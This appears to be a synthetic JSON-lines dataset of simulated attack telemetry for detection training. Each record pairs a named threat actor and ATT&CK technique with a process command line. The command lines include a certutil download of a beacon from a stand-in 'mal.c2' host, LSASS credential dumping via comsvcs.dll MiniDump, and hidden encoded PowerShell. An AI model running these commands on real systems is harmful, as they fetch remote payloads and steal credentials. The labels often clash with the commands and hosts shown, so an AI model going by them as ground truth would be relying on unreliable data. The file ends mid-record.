{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Initial Access","Defense Evasion","Collection"],"technique_id":"T1484.001"},"event_id":"evt_lapsus_20260906T162615000Z_0017295","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.110.131.111","name":"IAM-ROLE-B8JRN3SG1J","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17295Lapsus$T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.22.187.65","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-08-15T13:48:12.000Z","user":{"name":"CORP\\o5z6wbfyesfz","sid":"S-1-5-21-570319460-837330782-6215"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Execution","Defense Evasion","Privilege Escalation"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20250912T020846000Z_0017297","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.203.34.225","name":"APP-WEB-8THAS14SHS","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17297FIN7T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.1.22.179","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-08-13T07:54:39.000Z","user":{"name":"azuread\\hkbadenw9vap","sid":"S-1-5-21-413778239-429992589-8877"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Collection","Initial Access","Command and Control"],"technique_id":"T1003.001"},"event_id":"evt_lapsus_20260518T173656000Z_0017299","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["WMI","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.219.239.157","name":"APP-WEB-H12GPE0KNR","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17299Lapsus$T1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.57.151.213","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3040 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-06-25T07:54:47.000Z","user":{"name":"arn:aws:iam::tp4ncu5j9ff6","sid":"S-1-5-21-133638323-502877527-5042"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Credential Access"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20260606T145320000Z_0017301","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.9.250.93","name":"WIN-FIN-SRV-GDUKYOD6PL","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17301UNC4841T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.124.168.151","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3455 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-02-19T19:34:27.000Z","user":{"name":"CORP\\6zc80bpqg20i","sid":"S-1-5-21-110736999-915570232-7895"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Exfiltration","Persistence"],"technique_id":"T1570"},"event_id":"evt_apt41_20250622T143340000Z_0017303","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.102.209.124","name":"AZURE-VM-F1CKXIO2YD","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17303APT41T1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.57.133.127","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-05-19T06:01:20.000Z","user":{"name":"arn:aws:iam::z7361p9d00yo","sid":"S-1-5-21-962286612-532079024-9663"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Exfiltration"],"technique_id":"T1059.001"},"event_id":"evt_apt29_20260101T230307000Z_0017305","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.165.87.147","name":"EC2-INST-19X8PUE36I","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17305APT29T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.1.103.175","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-12-27T22:33:58.000Z","user":{"name":"svc_15d1tzm6md4b","sid":"S-1-5-21-655081067-293577718-4901"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Command and Control"],"technique_id":"T1059.001"},"event_id":"evt_volttyphoon_20260110T081206000Z_0017307","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.93.136.148","name":"EC2-INST-GTUGFKBNDC","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17307Volt TyphoonT1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.24.35.13","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-08-29T04:28:26.000Z","user":{"name":"azuread\\mgzyhox5mles","sid":"S-1-5-21-447726218-817448179-9318"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Discovery"],"technique_id":"T1546.003"},"event_id":"evt_volttyphoon_20251227T090321000Z_0017309","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.60.1.33","name":"IAM-ROLE-IP7JAJDUAB","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17309Volt TyphoonT1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.179.39.251","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-06-03T08:00:02.000Z","user":{"name":"svc_on3tltqyywrw","sid":"S-1-5-21-907047833-540220644-9552"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Credential Access"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20260613T175334000Z_0017311","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.27.107.149","name":"AZURE-VM-1GMOHVFB4A","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17311Lapsus$T1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.43.156.123","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-03-11T11:43:48.000Z","user":{"name":"azuread\\2ea1jg0j88ro","sid":"S-1-5-21-246515972-798655217-2929"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Exfiltration","Initial Access","Collection"],"technique_id":"T1484.001"},"event_id":"evt_volttyphoon_20250603T084929000Z_0017313","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.222.23.207","name":"EC2-INST-IG95CAGBFJ","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17313Volt TyphoonT1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.41.11.56","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1530 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-02-24T08:51:00.000Z","user":{"name":"CORP\\hvfwzvc52kqj","sid":"S-1-5-21-158759886-128306319-7763"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Defense Evasion"],"technique_id":"T1021.006"},"event_id":"evt_scatteredspider_20250924T103407000Z_0017315","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.63.123.128","name":"DB-ORACLE-Z3PSRI277Z","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17315Scattered SpiderT1021.006"},"network":{"domain":"github.com","dst_ip":"1.102.221.40","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-04-03T07:30:38.000Z","user":{"name":"arn:aws:iam::n13qxm3uj7sd","sid":"S-1-5-21-634938772-570194628-6039"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Initial Access","Collection"],"technique_id":"T1003.001"},"event_id":"evt_apt29_20260502T194448000Z_0017317","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.198.216.19","name":"DB-ORACLE-BKXW82H2BR","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17317APT29T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.155.112.227","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-07-23T07:00:20.000Z","user":{"name":"i-txrqrf02tydk","sid":"S-1-5-21-703332567-462331129-2022"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Privilege Escalation","Reconnaissance"],"technique_id":"T1531"},"event_id":"evt_volttyphoon_20260414T074130000Z_0017319","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.252.114.187","name":"DB-ORACLE-2PIXK5BN6L","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17319Volt TyphoonT1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.21.71.150","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2503 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2026-03-12T13:36:45.000Z","user":{"name":"svc_djkxs5rrvhrm","sid":"S-1-5-21-495782275-626456316-7613"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Initial Access","Defense Evasion","Exfiltration"],"technique_id":"T1484.001"},"event_id":"evt_apt41_20250430T215816000Z_0017321","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.162.80.219","name":"EC2-INST-9DC8ELGDL4","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17321APT41T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.146.54.203","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1199 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-03-14T07:12:57.000Z","user":{"name":"svc_81tjjbt50aey","sid":"S-1-5-21-932596402-796935619-6274"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Command and Control","Credential Access","Defense Evasion"],"technique_id":"T1570"},"event_id":"evt_apt29_20250224T165244000Z_0017323","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.181.86.212","name":"WIN-FIN-SRV-8MAM578MH5","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17323APT29T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.54.123.124","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-11-21T08:49:39.000Z","user":{"name":"svc_7tkhpcnelhzx","sid":"S-1-5-21-621616276-117912095-7558"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Persistence"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20260421T044108000Z_0017325","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.241.118.19","name":"AZURE-VM-CI2TGOJYX8","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17325Mustang PandaT1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.132.244.114","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-02-15T11:04:01.000Z","user":{"name":"azuread\\3torhh19i1hm","sid":"S-1-5-21-962022717-899090279-1753"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Persistence","Collection"],"technique_id":"T1570"},"event_id":"evt_apt29_20251224T104244000Z_0017327","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Base64","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.33.203.89","name":"AZURE-VM-4V5FTV0JCP","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17327APT29T1570"},"network":{"domain":"github.com","dst_ip":"1.25.201.75","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-12-06T09:14:49.000Z","user":{"name":"arn:aws:iam::amirl0ciyufn","sid":"S-1-5-21-157092102-979283095-9721"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Reconnaissance","Execution","Privilege Escalation"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20250119T073718000Z_0017329","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.190.235.252","name":"AZURE-VM-EYANTMGPLF","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17329Scattered SpiderT1566.001"},"network":{"domain":"github.com","dst_ip":"1.5.83.164","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2508 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-02-02T10:24:46.000Z","user":{"name":"arn:aws:iam::9mh1gd0o9zvd","sid":"S-1-5-21-646549822-228758007-2358"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Persistence","Command and Control","Credential Access"],"technique_id":"T1071.001"},"event_id":"evt_lapsus_20250923T012820000Z_0017331","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.131.87.248","name":"DB-ORACLE-KAVCL3AXZ4","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17331Lapsus$T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.160.217.167","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-04-29T04:10:35.000Z","user":{"name":"arn:aws:iam::lvu7k3s7uhd2","sid":"S-1-5-21-525977644-137299533-3965"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Exfiltration"],"technique_id":"T1531"},"event_id":"evt_volttyphoon_20250123T182031000Z_0017333","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["TLS","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.69.245.41","name":"IAM-ROLE-GG9GWXNOJR","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17333Volt TyphoonT1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.187.215.207","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"wmic.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-02-28T20:49:09.000Z","user":{"name":"i-9wo4ihqbhmuw","sid":"S-1-5-21-127773189-832814395-8405"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Privilege Escalation"],"technique_id":"T1484.001"},"event_id":"evt_apt41_20260903T140949000Z_0017335","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.236.230.134","name":"DB-ORACLE-784WHFEAC8","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17335APT41T1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.74.243.158","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-09-05T18:02:31.000Z","user":{"name":"azuread\\jhavrf837etc","sid":"S-1-5-21-151492966-645145760-6702"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Defense Evasion"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20261126T102011000Z_0017337","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.157.193.131","name":"EC2-INST-ZASWMV29JW","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17337Mustang PandaT1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.78.24.200","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 811 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-01-21T00:25:55.000Z","user":{"name":"azuread\\9d3zy2lc1wuh","sid":"S-1-5-21-296616824-525123288-5140"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Reconnaissance","Discovery"],"technique_id":"T1570"},"event_id":"evt_mustangpanda_20251205T093232000Z_0017339","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.126.119.102","name":"EC2-INST-YJFSFRZ5HQ","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17339Mustang PandaT1570"},"network":{"domain":"github.com","dst_ip":"1.117.139.172","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-05-09T10:22:23.000Z","user":{"name":"arn:aws:iam::onnynj8v9kf9","sid":"S-1-5-21-938517408-140442458-8004"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Credential Access","Reconnaissance","Lateral Movement"],"technique_id":"T1071.001"},"event_id":"evt_scatteredspider_20250112T191958000Z_0017341","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.201.122.202","name":"DB-ORACLE-DUZXCCLGLU","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17341Scattered SpiderT1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.3.119.171","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2176 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in 